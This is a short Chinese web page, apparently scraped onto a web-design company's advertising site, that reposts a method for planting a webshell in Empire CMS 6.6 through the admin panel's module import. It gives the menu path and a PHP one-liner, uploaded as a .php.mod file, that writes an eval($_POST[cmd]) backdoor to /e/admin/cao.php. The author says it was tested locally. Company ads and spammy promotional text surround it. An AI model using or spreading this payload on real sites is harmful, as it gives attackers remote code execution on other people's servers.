见http://www.wooyun.org/bugs/wooyun-2010-03787
创新互联公司主要从事网站制作、成都网站建设、网页设计、企业做网站、公司建网站等业务。立足成都服务黄山区,十余年网站建设经验,价格优惠、服务专业,欢迎来电咨询建站服务:028-86922220
以前6.5的有人发的方法是,(进入后台---系统设置---管理数据表---管理系统模型---导入新型模块,直接把修改过的php的shell改名为shell.php.mod上传,新版使用uploadm~num.php来递增数字)发现6.6不行,上传之后会变成类似uploadm1324885505nXmTdQamQq.php这样的!
换了个办法其实也很简单<?fputs(fopen("cao.php","w"),"<?eval(\$_POST[cmd]);?>")?> 保存为1.php.mod 然后还是进入后台---系统设置---管理数据表---管理系统模型---导入新型模块,上传之后马儿就躺在了/e/admin/cao.php了
本地6.6测试通过
<?fputs(fopen("cao.php","w"),"<?eval(\$_POST[cmd]);?>")?>
名称栏目:帝国cms后台getshell
本文链接:/article22/jpscjc.html
成都网站建设公司_创新互联,为您提供星空体育app最新版本(2024已更新)、小程序开发、网站改版、全网营销推广、品牌网站设计、网站设计
声明:本网站发布的内容(图片、视频和文字)以用户投稿、用户转载内容为主,如果涉及侵权请尽快告知,我们将会在第一时间删除。文章观点不代表本网站立场,如需处理请联系客服。电话:028-86922220;邮箱:631063699@qq.com。内容未经允许不得转载,或转载时需注明来源: 创新互联